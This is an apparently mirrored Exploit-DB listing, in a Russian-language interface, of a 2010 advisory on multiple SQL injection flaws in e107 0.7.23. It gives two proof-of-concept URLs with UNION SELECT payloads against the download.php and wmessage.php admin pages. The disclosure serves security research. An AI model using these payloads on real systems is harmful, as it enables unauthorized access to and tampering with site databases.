- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34653
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- HIGH-TECH BRIDGE SA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-09-17
e107 0.7.23 - Multiple SQL Injections
	
	
	
		
								
		Код:
	
	source: https://www.securityfocus.com/bid/43327/info
e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.23 is vulnerable; other versions may also be affected. 
http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29- Источник
- www.exploit-db.com
 
 
		